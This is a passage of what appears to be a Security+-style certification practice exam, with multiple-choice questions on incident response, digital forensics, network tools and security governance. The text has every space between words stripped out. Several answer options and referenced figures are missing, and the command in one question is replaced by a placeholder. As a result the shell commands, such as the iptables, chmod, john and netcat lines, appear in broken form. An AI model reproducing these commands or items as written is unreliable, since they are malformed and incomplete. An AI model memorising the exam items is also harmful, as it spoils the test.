followingistheprimaryreasonthatorganizationscommunicatewithandinvolvestafffromaffectedareasthroughouttheorganizationinincidentresponseefforts?

A. Legalcompliance

B. Retentionpolicies

C. Stakeholdermanagement

D. ACOOP

47. Elleisconductinganexerciseforherorganizationandwantstorunanexercisethatisasclosetoanactualeventaspossible.Whattypeofeventshouldsheruntohelpherorganizationgetthistypeofreal-worldpractice?

A. Asimulation

B. Atabletopexercise

C. Awalk-through

D. Awargame

48. Erinwantstodeterminewhatdevicesareonanetworkbutcannotuseaportscannerorvulnerabilityscanner.Whichofthefollowingtechniqueswillprovidethemostdataaboutthesystemsthatareactiveonthenetwork?

A. RunWiresharkinpromiscuousmode.

B. QueryDNSforallArecordsinthedomain.

C. ReviewtheCAMtablesforalltheswitchesinthenetwork.

D. Runnetstatonalocalworkstation.

49. WhatSIEMcomponentcollectsdataandsendsittotheSIEMforanalysis?

A. Analertlevel

B. Atrendanalyzer

C. Asensor

D. Asensitivitythreshold

50. Alainasetsherantimalwaresolutiontomoveinfectedfilestoasafestoragelocationwithoutremovingthemfromthesystem.Whattypeofsettinghassheenabled?

A. Purge


B. Deep-freeze

C. Quarantine

D. Retention

51. AseniorvicepresidentintheorganizationthatChuckworksinrecentlylostaphonethatcontainedsensitivebusinessplansandinformationaboutsuppliers,designs,andotherimportantmaterials.Afterinterviewingthevicepresident,Chuckfindsoutthatthephonedidnothaveapasscodesetandwasnotencrypted,andthatitcouldnotberemotelywiped.WhattypeofcontrolshouldChuckrecommendforhiscompanytohelppreventfutureissueslikethis?

A. Usecontainmenttechniquesontheimpactedphones.

B. DeployaDLPsystem.

C. DeployanMDMsystem.

D. Isolatetheimpactedphones.

52. TheschoolthatGabbyworksforwantstopreventstudentsfrombrowsingwebsitesthatarenotrelatedtoschoolwork.Whattypeofsolutionisbestsuitedtohelppreventthis?

A. Acontentfilter

B. ADLP

C. Afirewall

D. AnIDS

53. Frankknowsthatforensicinformationheisinterestedinisstoredonasystem'sharddrive.Ifhewantstofollowtheorderofvolatility,whichofthefollowingitemsshouldbeforensicallycapturedaftertheharddrive?

A. Cachesandregisters

B. Backups

C. Virtualmemory

D. RAM

54. Gregrunsthefollowingcommand.Whatoccurs?

chmod-R755/home/greg/files


A. Allofthefilesin/home/greg/aresettoallowthegrouptoread,write,andexecutethem,andGregandtheworldcanonlyreadthem.

B. Theread,write,andexecutepermissionswillberemovedfromallfilesinthe/home/greg/filesdirectory.

C. Allofthefilesin/home/greg/filesaresettoallowGregtoread,write,andexecutethem,andthegroupandtheworldcanonlyreadthem.

D. Anewdirectorywillbecreatedwithread,write,andexecutepermissionsfortheworldandread-onlypermissionsforGregandthegroupheisin.

55. Charleswantstoensurethattheforensicworkthatheisdoingcannotberepudiated.Howcanhevalidatehisattestationsanddocumentationtoensurenonrepudiation?

A. Encryptallforensicoutput.

B. Digitallysigntherecords.

C. CreateaMD5checksumofallimages.

D. Alloftheabove

56. Dianawantstocapturethecontentsofphysicalmemoryusingacommand-linetoolonaLinuxsystem.Whichofthefollowingtoolscanaccomplishthistask?

A. ramdump

B. system-dump

C. memcpy

D. memdump

57. ValeriewantstocapturethepagefilefromaWindowssystem.Wherecanshefindthefileforacquisition?

A. C:\Windows\swap

B. C:\pagefile.sys

C. C:\Windows\users\swap.sys


D. C:\swap\pagefile.sys

58. Meganneedstoconductaforensicinvestigationofavirtualmachine(VM)hostedinaVMwareenvironmentaspartofanincidentresponseeffort.WhatisthebestwayforhertocollecttheVM?

A. AsasnapshotusingtheVMwarebuilt-intools

B. Byusingddtoanexternaldrive

C. Byusingddtoaninternaldrive

D. Byusingaforensicimagingdeviceafterremovingtheserver'sdrives

59. Whatforensicconceptiskeytoestablishingprovenanceforaforensicartifact?

A. Righttoaudit

B. Preservation

C. Chainofcustody

D. Timelines

60. Whatroledodigitalforensicsmostoftenplayincounterintelligenceefforts?

A. Theyareusedtodeterminewhatinformationwasstolenbyspies.

B. Theyareusedtoanalyzetoolsandtechniquesusedbyintelligenceagencies.

C. Theyarerequiredfortrainingpurposesforintelligenceagents.

D. Theydonotplayaroleincounterintelligence.

61. Whichofthefollowinggroupsisnottypicallypartofanincidentresponseteam?

A. Lawenforcement

B. Securityanalysts

C. Management

D. Communicationsstaff

62. BobneedstoblockSecureShell(SSH)trafficbetweentwosecurityzones.WhichofthefollowingLinuxiptablesfirewallruleswillblockthattrafficfromthe10.0.10.0/24networktothesystemtheruleisrunningon?


A. iptables-AINPUT-ptcp--dport22-ieth0-s10.0.10.0/24-jDROP

B. iptables-DOUTPUT-pudp-dport21-ieth0-s10.0.10.255-jDROP

C. iptables-AOUTPUT-pudp--dport22-ieth0-s10.0.10.255-jBLOCK

D. iptables-DINPUT-pudp--dport21-Ieth0-s10.0.10.0/24-jDROP

63. MariawantstoaddentriesintotheLinuxsystemlogsothattheywillbesenttohersecurityinformationandeventmanagement(SIEM)devicewhenspecificscriptedeventsoccur.WhatLinuxtoolcansheusetodothis?

A. cat

B. slogd

C. logger

D. tail

64. Amanda'sorganizationdoesnotcurrentlyhaveanincidentresponseplan.Whichofthefollowingreasonsisnotonesheshouldpresenttomanagementinsupportofcreatingone?

A. Itwillpreventincidentsfromoccurring.

B. Itwillhelprespondersreactappropriatelyunderstress.

C. Itwillpreparetheorganizationforincidents.

D. Itmayberequiredforlegalorcompliancereasons.

65. Whichofthefollowingscenariosisleastlikelytoresultindatarecoverybeingpossible?

A. Afileisdeletedfromadisk.

B. Afileisoverwrittenbyasmallerfile.

C. Aharddriveisquick-formatted.

D. Adiskisdegaussed.

66. Henryrecordsavideooftheremovalofadrivefromasystemasheispreparingforaforensicinvestigation.Whatisthemostlikelyreasonfor


Henrytorecordthevideo?

A. Tomeettheorderofvolatility

B. Toestablishguiltbeyondareasonabledoubt

C. Toensuredatapreservation

D. Todocumentthechainofcustodyandprovenanceofthedrive

67. Adamwantstouseatooltoeditthecontentsofadrive.Whichofthefollowingtoolsisbestsuitedtothatpurpose?

A. Autopsy

B. WinHex

C. dd

D. FTKImager

68. Jillwantstobuildachecklistthatincludesallthestepstorespondtoaspecificincident.Whattypeofartifactshouldshecreatetodosoinhersecurityorchestration,automation,andresponse(SOAR)environment?

A. ABCplan

B. Aplaybook

C. ADRplan

D. Arunbook

69. Alainawantstouseapasswordcrackeragainsthashedpasswords.Whichofthefollowingitemsismostimportantforhertoknowbeforeshedoesthis?

A. Thelengthofthepasswords

B. Thelastdatethepasswordswerechanged

C. Thehashingmethodusedforthepasswords

D. Theencryptionmethodusedforthepasswords

70. Vincentwantstoensurethathisstaffdoesnotinstallapopulargameontheworkstationstheyareissued.Whattypeofcontrolcouldhedeployaspartofhisendpointsecuritysolutionthatwouldmosteffectivelystopthis?

A. Anapplicationapprovedlist


B. ADLP

C. Acontentfilter

D. Anapplicationblocklist

71. CharlenewantstosetupatoolthatcanallowhertoseeallthesystemsagivenIPaddressconnectstoandhowmuchdataissenttothatIPbyportandprotocol.Whichofthefollowingtoolsisnotsuitedtomeetthatneed?

A. IPFIX

B. IPSec

C. sFlow

D. NetFlow

72. AsystemthatSamisresponsibleforcrashed,andSamsuspectsmalwaremayhavecausedanissuethatledtothecrash.Whichofthefollowingfilesismostlikelytocontaininformationifthemalwarewasafile-less,memory-residentmalwarepackage?

A. Theswapfile

B. TheWindowssystemlog

C. Adumpfile

D. TheWindowssecuritylog

73. WhichofthefollowingcommandscanbeusedtoshowtheroutetoaremotesystemonaWindows10workstation?

A. traceroute

B. arp

C. tracert

D. netstat

74. ToolslikePRTGandCactithatmonitorSNMPinformationareusedtoprovidewhattypeofinformationforanincidentinvestigation?

A. Authenticationlogs

B. Bandwidthmonitoring

C. Systemloginformation


D. Emailmetadata

75. Whichofthefollowingisnotakeyconsiderationwhenconsideringon-premisesversuscloudforensicinvestigations?

A. Databreachnotificationlaws

B. Right-to-auditclauses

C. Regulatoryrequirements

D. Provenance

76. ThecompanyCharlesworksforhasrecentlyhadastolencompanycellphoneresultinadatabreach.Charleswantstopreventfutureincidentsofasimilarnature.Whichofthefollowingmitigationtechniqueswouldbethemosteffective?

A. EnableFDEviaMDM.

B. Afirewallchange

C. ADLPrule

D. AnewURLfilterrule

77. Henryrunsthefollowingcommand:

[email protected]

Whatwillitdo?

A. Searchexample.com'sDNSserverforthehost8.8.8.8.

B. Search8.8.8.8'sDNSinformationforexample.com.

C. Lookupthehostnamefor8.8.8.8.

D. Performopensourceintelligencegatheringabout8.8.8.8andexample.com.

78. GregiscollectingaforensicimageofadriveusingFTKImager,andhewantstoensurethathehasavalidcopy.Whatshouldhedonext?

A. RuntheLinuxcmpcommandtocomparethetwofiles.

B. CalculateanAES-256hashofthetwodrives.

C. CompareanMD5orSHA-1hashofthedrivetotheimage.


D. ComparetheMD5ofeachfileonthedrivetotheMD5ofeachfileintheimage.

79. Adamneedstosearchforastringinalargetextfile.Whichofthefollowingtoolsshouldheusetomostefficientlyfindeveryoccurrenceofthetextheissearchingfor?

A. cat

B. grep

C. head

D. tail

80. Angelawantstousesegmentationaspartofhermitigationtechniques.Whichofthefollowingbestdescribesasegmentationapproachtonetworksecurity?

A. Removingpotentiallyinfectedorcompromisedsystemsfromthenetwork

B. Usingfirewallsandothertoolstolimitthespreadofanactiveinfection

C. Partitioningthenetworkintosegmentsbasedonuserandsystemrolesandsecurityrequirements

D. Addingsecuritysystemsordevicestopreventdatalossandexposure’

81. Charlenehasbeenaskedtowriteabusinesscontinuity(BC)planforherorganization.Whichofthefollowingwillabusinesscontinuityplanbesthandle?

A. Howtorespondduringaperson-madedisaster

B. Howtokeeptheorganizationrunningduringasystemoutage

C. Howtorespondduringanaturaldisaster

D. Alloftheabove

82. Bradwantstocreateaself-signedx.509certificate.Whichofthefollowingtoolscanbeusedtoperformthistask?

A. hping

B. Apache


C. OpenSSL

D. scp

83. Cameronwantstotestforcommonlyusedpasswordsinhisorganization.Whichofthefollowingcommandswouldbemostusefulifheknowsthathisorganization'sname,mascot,andsimilartermsareoftenusedaspasswords?

A. john--wordlist"mywords.txt"--passwordfile.txt

B. ssh-test-"mascotname,orgname"

C. john-showpasswordfile.txt

D. crack-passwords-wordlist"mascotname,orgname"

84. WhichofthefollowingcapabilitiesisnotbuiltintoAutopsy?

A. Diskimaging

B. Timelinegeneration

C. Automaticimagefiltering

D. Communicationvisualization

85. Alaina'scompanyisconsideringsigningacontractwithacloudserviceprovider,andwantstodeterminehowsecuretheirservicesare.Whichofthefollowingisamethodsheislikelytobeabletousetoassessit?

A. Askforpermissiontovulnerabilityscanthevendor'sproductionservice.

B. Conductanauditoftheorganization.

C. ReviewanexistingSOCaudit.

D. Hireathirdpartytoaudittheorganization.

86. ErinisworkingthroughtheCyberKillChainandhascompletedtheexploitationphaseaspartofapenetrationtest.Whatstepwouldcomenext?

A. Lateralmovement


C. Obfuscation

D. Exfiltration


87. Danawantstouseanexploitationframeworktoperformarealisticpenetrationtestofherorganization.Whichofthefollowingtoolswouldfitthatrequirement?

A. Cuckoo

B. theHarvester

C. Nessus

D. Metasploit

88. CynthiahasbeenaskedtobuildaplaybookfortheSOARsystemthatherorganizationuses.Whatwillshebuild?

A. AsetofruleswithactionsthatwillbeperformedwhenaneventoccursusingdatacollectedorprovidedtotheSOARsystem

B. Anautomatedincidentresponseprocessthatwillberuntosupporttheincidentresponse(IR)team

C. Atrendanalysis–drivenscriptthatwillprovideinstructionstotheIRteam

D. AsetofactionsthattheteamwillperformtousetheSOARtorespondtoanincident

89. Whatincidentresponsestepismissinginthefollowingimage?


A. Businesscontinuity

B. Containment

C. Response

D. Discovery

90. Gurvinder'scorporatedatacenterislocatedinanareathatFEMAhasidentifiedasbeingpartofa100-yearfloodplain.Heknowsthatthereisachanceinanygivenyearthathisdatacentercouldbecompletelyfloodedandunderwater,andhewantstoensurethathisorganizationknowswhattodoifthathappens.Whattypeofplanshouldhewrite?

A. AContinuityofOperationsPlan

B. Abusinesscontinuityplan

C. Afloodinsuranceplan


D. Adisasterrecoveryplan

91. Frankwantstoidentifywherenetworklatencyisoccurringbetweenhiscomputerandaremoteserver.Whichofthefollowingtoolsisbestsuitedtoidentifyingboththerouteusedandwhichsystemsarerespondinginatimelymanner?

A. ping

B. tracert

C. pathping

D. netcat

92. DerekwantstoseewhatDNSinformationcanbequeriedforhisorganizationaswellaswhathostnamesandsubdomainsmayexist.WhichofthefollowingtoolscanprovidebothDNSqueryinformationandGooglesearchinformationabouthostsanddomainsthroughasingletool?

A. dnsenum

B. dig

C. host

D. dnscat

93. Jillhasbeenaskedtoperformdatarecoveryduetoherforensicskills.Whatshouldshetellthepersonaskingtoperformdatarecoverytogiveherthebestchanceofrestoringlostfilesthatwereaccidentallydeleted?

A. Immediatelyrebootusingtheresetswitchtocreatealostfilememorydump.

B. Turnoff“securedelete”sothatthefilescanbemoreeasilyrecovered.

C. Donotsaveanyfilesormakeanychangestothesystem.

D. Alloftheabove

94. WhatphasefollowslateralmovementintheCyberKillChain?

A. Exfiltration

B. Exploitation

C. Anti-forensics



95. Veronicahascompletedtherecoveryphaseofherorganization'sincidentresponseplan.Whatphaseshouldshemoveintonext?

A. Preparation

B. Lessonslearned

C. Recovery

D. Documentation

96. Michellehasbeenaskedtosanitizeanumberofdrivestoensurethatsensitivedataisnotexposedwhensystemsareremovedfromservice.Whichofthefollowingisnotavalidmeansofsanitizingharddrives?

A. Physicaldestruction

B. Degaussing

C. Quick-formattingthedrives

D. Zero-wipingthedrives

97. Bartisinvestigatinganincident,andneedstoidentifythecreatorofaMicrosoftOfficedocument.Wherewouldhefindthattypeofinformation?

A. Inthefilename

B. IntheMicrosoftOfficelogfiles

C. IntheWindowsapplicationlog

D. Inthefilemetadata

98. NathanielwantstoallowChromethroughtheWindowsDefenderfirewall.Whattypeoffirewallrulechangewillheneedtopermitthis?

A. AllowTCP80and443trafficfromthesystemtotheInternet.

B. AddChrometotheWindowsDefenderFirewallallowedapplications.

C. AllowTCP80and443trafficfromtheInternettothesystem.

D. Alloftheabove

99. NathanwantstoperformwhoisqueriesonallthehostsinaclassCnetwork.WhichofthefollowingtoolscandothatandalsobeusedtodiscovernoncontiguousIPblocksinanautomatedfashion?

A. netcat


B. dnsenum

C. dig

D. nslookup

100. Whatkeyforensictoolreliesoncorrectlysetsystemclockstoworkproperly?

A. Diskhashing

B. Timelining

C. Forensicdiskacquisition

D. Filemetadataanalysis

101. Valerieiswritingherorganization'sforensicplaybooksandknowsthatthestatethatsheoperatesinhasadatabreachnotificationlaw.Whichofthefollowingkeyitemsismostlikelytobeinfluencedbythatlaw?

A. WhetherValeriecallsthepoliceforforensicinvestigationhelp

B. Themaximumamountoftimeuntilshehastonotifycustomersofsensitivedatabreaches

C. Thecertificationtypesandlevelsthatherstaffhavetomaintain

D. Themaximumnumberofresidentsthatshecannotifyaboutabreach

102. Aspartofabreachresponse,NaomidiscoversthatSocialSecuritynumbers(SSNs)weresentinaspreadsheetviaemailbyanattackerwhogainedcontrolofaworkstationathercompany'sheadquarters.NaomiwantstoensurethatmoreSSNsarenotsentfromherenvironment.Whattypeofmitigationtechniqueismostlikelytopreventthiswhileallowingoperationstocontinueinasnormalamanneraspossible?

A. Antimalwareinstalledattheemailgateway

B. Afirewallthatblocksalloutboundemail

C. ADLPruleblockingSSNsinemail

D. AnIDSruleblockingSSNsinemail

103. Troywantstoreviewmetadataaboutanemailhehasreceivedtodeterminewhatsystemorservertheemailwassentfrom.Wherecanhefindthisinformation?


A. Intheemailmessage'sfooter

B. Intheto:field

C. Intheemailmessage'sheaders

D. Inthefrom:field

104. Henryisworkingwithlocalpoliceonaforensiccaseanddiscoversthatheneedsdatafromaserviceproviderinanotherstate.Whatissueislikelytolimittheirabilitytoacquiredatafromtheserviceprovider?

A. Jurisdiction

B. Venue

C. Legislation

D. Breachlaws

105. Oliviawantstotestthestrengthofpasswordsonsystemsinhernetwork.Whichofthefollowingtoolsisbestsuitedtothattask?

A. JohntheRipper

B. Rainbowtables

C. Crack.it

D. TheHunter

106. WhatU.S.federalagencyisinchargeofCOOP?

A. TheUSDA

B. FEMA

C. TheNSA

D. TheFBI

107. ElainewantstowriteaseriesofscriptstogathersecurityconfigurationinformationfromWindows10workstations.Whattoolshouldsheusetoperformthistask?

A. Bash

B. PowerShell

C. Python

D. SSH


108. Aspartofhisincidentresponse,RamonwantstodeterminewhatwassaidonaVoiceoverIP(VoIP)call.Whichofthefollowingdatasourceswillprovidehimwiththeaudiofromthecall?

A. Callmanagerlogs

B. SIPlogs

C. AWiresharkcaptureoftrafficfromthephone

D. Noneoftheabove

109. Isabellewantstogatherinformationaboutwhatsystemsahostisconnectingto,howmuchtrafficissent,andsimilardetails.Whichofthefollowingoptionswouldnotallowhertoperformthattask?

A. IPFIX

B. NetFlow

C. NXLog

D. sFlow

110. Aspartofanincidentresponseprocess,PeteputsacompromisedsystemontoavirtualLAN(VLAN)thathecreatesthatonlyhousesthatsystemanddoesnotallowitaccesstotheInternet.Whatmitigationtechniquehasheused?

A. Isolation

B. Containment

C. Segmentation

D. Eradication

111. Luccaneedstoconductaforensicexaminationofalivevirtualmachine(VM).Whatforensicartifactshouldheacquire?

A. AnimageoflivememoryusingFTKImagerfromtheVM

B. Addimageofthevirtualmachinediskimage

C. AsnapshotoftheVMusingtheunderlyingvirtualizationenvironment

D. Alloftheabove

112. JameshasaPCAPfilethathesavedwhileconductinganincidentresponseexercise.Hewantstodetermineifhisintrusionpreventionsystem(IPS)


coulddetecttheattackafterconfiguringnewdetectionrules.WhattoolwillhelphimusethePCAPfileforhistesting?

A. hping

B. tcpreplay

C. tcpdump

D. Cuckoo

113. WhattypeoffileiscreatedwhenWindowsexperiencesabluescreenofdeath?

A. Asecuritylog

B. Abluelog

C. Adumpfile

D. Atcpdump

114. Edwantstoensurethatacompromiseonhisnetworkdoesnotspreadtopartsofthenetworkwithdifferentsecuritylevels.Whatmitigationtechniqueshouldheusepriortotheattacktohelpwiththis?

A. Isolation

B. Fragmentation

C. Tiering

D. Segmentation

115. Derekhasacquiredover20harddrivesaspartofaforensicinvestigation.Whatkeyprocessisimportanttoensurethateachdriveistrackedandmanagedproperlyovertime?

A. Taggingthedrives

B. Takingpicturesofeachdrive

C. Labelingeachdrivewithitsorderofvolatility

D. Interviewingeachpersonwhosedriveisimaged

116. Whattermdescribestheownership,custody,andacquisitionofdigitalforensicartifactsandimages?

A. E-discovery


B. Provenance

C. Jurisdiction

D. Volatility

117. Ellewantstoacquirethelivememory(RAM)fromamachinethatiscurrentlyturnedon.Whichofthefollowingtoolsisbestsuitedtoacquiringthecontentsofthesystem'smemory?

A. Autopsy

B. TheVolatilityframework

C. dd

D. netcat

118. Randybelievesthatamisconfiguredfirewallisblockingtrafficsentfromsomesystemsinhisnetworktohiswebserver.HeknowsthatthetrafficshouldbecominginasHTTPStohiswebserver,andhewantstochecktomakesurethetrafficisreceived.Whattoolcanheusetotesthistheory?

A. tracert

B. Sn1per

C. traceroute

D. Wireshark

119. RyanwantstoimplementaflexibleandreliableremoteloggingenvironmentforhisLinuxsystems.Whichofthefollowingtoolsisleastsuitedtothatrequirement?

A. rsyslog

B. syslog

C. NXLog

D. syslog-ng

120. Susanhasbeenreadingaboutanewlydiscoveredexploit,andwantstotestherIPSrulestoseeifthesamplecodewillwork.Inordertousetheexploit,sheneedstosendaspecificallycraftedUDPpackettoaDHCPserver.Whattoolcansheusetocraftandsendthistestexploittoseeifitisdetected?


A. hping

B. scanless

C. curl

D. pathping

121. ValeriewantstochecktoseeifaSQLinjectionattackoccurredagainstherwebapplicationonaLinuxsystem.Whichlogfileshouldshecheckforthistypeofinformation?

A. Thesecuritylog

B. TheDNSlog

C. Theauthlog

D. Thewebserverlog

122. Olivia'scompanyhasexperiencedabreachandbelievesthattheattackerswereabletoaccessthecompany'swebservers.Thereisevidencethattheprivatekeysforthecertificatesfortheserverwereexposedandthatthepassphrasesforthecertificateswerekeptinthesamedirectory.WhatactionshouldOliviataketohandlethisissue?

A. Revokethecertificates.

B. Changethecertificatepassword.

C. Changetheprivatekeyforthecertificate.

D. Changethepublickeyforthecertificate.

123. Jean'scompanyispreparingforlitigationwithanothercompanythattheybelievehascausedharmtoJean'sorganization.WhattypeoflegalactionshouldJean'slawyertaketoensurethatthecompanypreservesfilesandinformationrelatedtothelegalcase?

A. Achainofcustodydemandletter

B. Ane-discoverynotice

C. Alegalholdnotice

D. Anorderofvolatility

124. CynthiawantstodisplayalloftheactiveconnectionsonaWindowssystem.Whatcommandcansheruntodoso?


A. route

B. netstat-a

C. netstat-c

D. hping

125. Whattypeofmitigationplacesamaliciousfileorapplicationinasafelocationforfuturerevieworstudy?

A. Containment

B. Quarantine

C. Isolation

D. Deletion

126. WhatlocationiscommonlyusedforLinuxswapspace?

A. \root\swap

B. \etc\swap

C. \proc\swap

D. Aseparatepartition

127. Marcoisconductingaforensicinvestigationandispreparingtopulleightdifferentstoragedevicesfromcomputersthathewillanalyze.Whatshouldheusetotrackthedrivesasheworkswiththem?

A. Tagswithsystem,serialnumber,andotherinformation

B. MD5checksumsofthedrives

C. Timestampsgatheredfromthedrives

D. Noneoftheabove;thedrivescanbeidentifiedbythedatatheycontain

128. Isaacexecutesthefollowingcommandusingnetcat:

nc-v10.11.10.11-1024

Whathashedone?

A. Openedawebpage

B. Connectedtoaremoteshell


C. Openedalocalshelllistener

D. Performedaportscan

129. Tonyworksforalargecompanywithmultiplesites.Hehasidentifiedanincidentinprogressatonesitethatisconnectedtotheorganization'smultisiteintranet.Whichofthefollowingoptionsisbestsuitedtopreservingtheorganization'sfunctionandprotectingitfromissuesatthatlocation?

A. Isolation

B. Containment

C. Segmentation

D. Noneoftheabove

130. Whichofthefollowingenvironmentsisleastlikelytoallowaright-to-auditclauseinacontract?

A. Adatacenterco-locationfacilityinyourstate

B. Arentedfacilityforacorporateheadquarters

C. Acloudserverprovider

D. Adatacenterco-locationfacilityinthesamecountrybutnotthesamestate

131. Alaina'sorganizationhasbeensufferingfromsuccessfulphishingattacks,andAlainanoticesanewemailthathasarrivedwithalinktoaphishingsite.Whatresponseoptionfromthefollowingwillbemostlikelytostopthephishingattackfromsucceedingagainstherusers?

A. AWAF

B. Apatch

C. Anallowlist

D. AURLfilter

132. Benwritesdownthechecklistofstepsthathisorganizationwillperformintheeventofacryptographicmalwareinfection.Whattypeofresponsedocumenthashecreated?

A. Aplaybook


B. ADRplan

C. ABCplan

D. Arunbook

133. Whichofthefollowingisnotinformationthatcanbegatheredfromasystembyrunningthearpcommand?

A. TheIPaddressofthelocalsystem

B. TheMACaddressesofrecentlyresolvedexternalhosts

C. WhethertheIPaddressisdynamicorstatic

D. TheMACaddressesofrecentlyresolvedlocalhosts

134. WhatlogwilljournalctlprovideSelahaccessto?

A. Theeventlog

B. Theauthlog

C. Thesystemdjournal

D. Theauthenticationjournal

135. Whatphaseoftheincidentresponseprocessofteninvolvesaddingfirewallrulesandpatchingsystemstoaddresstheincident?

A. Preparation

B. Eradication

C. Recovery

D. Containment

136. GarywantstouseatoolthatwillallowhimtodownloadfilesviaHTTPandHTTPS,SFTP,andTFTPfromwithinthesamescript.Whichcommand-linetoolshouldhepickfromthefollowinglist?

A. curl

B. hping

C. theHarvester

D. nmap

137. Timwantstocheckthestatusofmalwareinfectionsinhisorganizationusingtheorganization'ssecurityinformationandeventmanagement


(SIEM)device.WhatSIEMdashboardwilltellhimaboutwhethertherearemoremalwareinfectionsinthepastfewdaysthannormal?

A. Thealertsdashboard

B. Thesensorsdashboard

C. Thetrendsdashboard

D. Thebandwidthdashboard

138. Warrenisgatheringinformationaboutanincidentandwantstofollowuponareportfromanenduser.Whatdigitalforensictechniqueisoftenusedwhenendusersareakeypartoftheinitialincidentreport?

A. Emailforensics

B. Interviews

C. Diskforensics

D. Chainofcustody

139. AaronwantstouseamultiplatformloggingtoolthatsupportsbothWindowsandUnix/Linuxsystemsandmanylogformats.Whichofthefollowingtoolsshouldheusetoensurethathisloggingenvironmentcanacceptandprocesstheselogs?

A. IPFIX

B. NXLog

C. syslog

D. journalctl

140. Whichofthefollowingisnotacommontypeofincidentresponseexercise?

A. Drills

B. Simulations

C. Tabletop

D. Walk-throughs

141. Susanneedstorunaportscanofanetwork.Whichofthefollowingtoolswouldnotallowhertoperformthattypeofscan?

A. netstat


B. netcat

C. nmap

D. Nessus

142. WhattermbelongsatpointAontheDiamondModelofIntrusionAnalysisshownbelow?

A. Opponent

B. Target

C. Adversary

D. System

143. ThegovernmentagencythatVincentworksforhasreceivedaFreedomofInformationAct(FoIA)requestandneedstoprovidetherequestedinformationfromitsemailservers.Whatisthisprocesscalled?


A. Emailforensics

B. Aninquisition

C. e-discovery

D. Provenance


Chapter5Governance,Risk,andCompliance


5.1Compareandcontrastvarioustypesofcontrols

5.2Explaintheimportanceofapplicableregulations,standards,orframeworksthatimpactorganizationalsecurityposture

5.3Explaintheimportanceofpoliciestoorganizationalsecurity

5.4Summarizeriskmanagementprocessesandconcepts

5.5Explainprivacyandsensitivedataconceptsinrelationtosecurity

1. Carolinehasbeenaskedtofindaninternationalstandardtoguidehercompany'schoicesinimplementinginformationsecuritymanagementsystems.Whichofthefollowingwouldbethebestchoiceforher?

A. ISO27002

B. ISO27017

C. NIST800-12

D. NIST800-14

2. Adamisconcernedaboutmalwareinfectingmachinesonhisnetwork.Oneofhisconcernsisthatmalwarewouldbeabletoaccesssensitivesystemfunctionalitythatrequiresadministrativeaccess.Whattechniquewouldbestaddressthisissue?

A. Implementinghost-basedantimalware

B. Usinganonadministrativeaccountfornormalactivities

C. Implementingfull-diskencryption(FDE)

D. Makingcertaintheoperatingsystemsarepatched


3. Youareresponsibleforsettingupnewaccountsforyourcompanynetwork.Whatisthemostimportantthingtokeepinmindwhensettingupnewaccounts?

A. Passwordlength

B. Passwordcomplexity

C. Accountage

D. Leastprivileges

4. Whichofthefollowingprinciplesstipulatesthatmultiplechangestoacomputersystemshouldnotbemadeatthesametime?

A. Duediligence

B. Acceptableuse

C. Changemanagement

D. Duecare

5. Youareasecurityengineeranddiscoveredanemployeeusingthecompany'scomputersystemstooperatetheirsmallbusiness.Theemployeeinstalledtheirpersonalsoftwareonthecompany'scomputerandisusingthecomputerhardware,suchastheUSBport.Whatpolicywouldyourecommendthecompanyimplementtopreventanyriskofthecompany'sdataandnetworkbeingcompromised?

A. Acceptableusepolicy

B. Cleandeskpolicy

C. Mandatoryvacationpolicy

D. Jobrotationpolicy

6. Whatstandardisusedforcreditcardsecurity?

A. GDPR

B. COPPA

C. PCI-DSS

D. CIS

7. Youareasecuritymanagerforyourcompanyandneedtoreducetheriskofemployeesworkingincollusiontoembezzlefunds.Whichofthefollowing


policieswouldyouimplement?

A. Mandatoryvacations

B. Cleandesk

C. NDA

D. Continuingeducation

8. Afteryourcompanyimplementedacleandeskpolicy,youhavebeenaskedtosecurephysicaldocumentseverynight.Whichofthefollowingwouldbethebestsolution?

A. Departmentdoorlock

B. Lockingcabinetsanddrawersateachdesk

C. Proximitycards

D. Onboarding

9. Whichofthefollowingtechniquesattemptstopredictthelikelihoodathreatwilloccurandassignsmonetaryvaluesshouldalossoccur?

A. Changemanagement

B. Vulnerabilityassessment

C. Qualitativeriskassessment

D. Quantitativeriskassessment

10. Whichofthefollowingagreementsislessformalthanatraditionalcontractbutstillhasacertainlevelofimportancetoallpartiesinvolved?

A. SLA

B. BPA

C. ISA

D. MOU

11. Aspartoftheresponsetoacreditcardbreach,Sallydiscoversevidencethatindividualsinherorganizationwereactivelyworkingtostealcreditcardinformationandpersonallyidentifiableinformation(PII).Shecallsthepolicetoengagethemfortheinvestigation.Whathasshedone?

A. Escalatedtheinvestigation


B. Publicnotification

C. Outsourcedtheinvestigation

D. Tokenizedthedata

12. Youhaveanassetthatisvaluedat$16,000,theexposurefactorofariskaffectingthatassetis35percent,andtheannualizedrateofoccurrenceis75percent.WhatistheSLE?

A. $5,600

B. $5,000

C. $4,200

D. $3,000

13. Duringameeting,youpresentmanagementwithalistofaccesscontrolsusedonyournetwork.Whichofthefollowingcontrolsisanexampleofacorrectivecontrol?

A. IDS

B. Auditlogs

C. Antivirussoftware

D. Router

14. Youarethenewsecurityadministratorandhavediscoveredyourcompanylacksdeterrentcontrols.Whichofthefollowingwouldyouinstallthatsatisfiesyourneeds?

A. Lighting

B. Motionsensor

C. Hiddenvideocameras

D. Antivirusscanner

15. Yourcompany'ssecuritypolicyincludessystemtestingandsecurityawarenesstrainingguidelines.Whichofthefollowingcontroltypesisthis?

A. Detectivetechnicalcontrol

B. Preventivetechnicalcontrol

C. Detectiveadministrativecontrol


D. Preventiveadministrativecontrol

16. Youareasecurityadministratorforyourcompanyandyouidentifyasecurityrisk.Youdecidetocontinuewiththecurrentsecurityplan.However,youdevelopacontingencyplanincasethesecurityriskoccurs.Whichofthefollowingtypeofriskresponsetechniqueareyoudemonstrating?

A. Accept

B. Transfer

C. Avoid

D. Mitigate

17. Jim'scompanyoperatesfacilitiesinIllinois,Indiana,andOhio,buttheheadquartersisinIllinois.WhichstatelawsdoesJimneedtoreviewandhandleaspartofhissecurityprogram?

A. AllU.S.statelaws

B. Illinois

C. OnlyU.S.federallaws

D. StatelawsinIllinois,Indiana,andOhio

18. YouareanITadministratorforacompanyandyouareaddingnewemployeestoanorganization'sidentityandaccessmanagementsystem.Whichofthefollowingbestdescribestheprocessyouareperforming?

A. Onboarding

B. Offboarding

C. Adverseaction

D. Jobrotation

19. Markisanofficemanageratalocalbankbranch.Hewantstoensurethatcustomerinformationisn'tcompromisedwhenthedesksideemployeesareawayfromtheirdesksfortheday.WhatsecurityconceptwouldMarkusetomitigatethisconcern?

A. Cleandesk

B. Backgroundchecks


C. Continuingeducation

D. Jobrotation

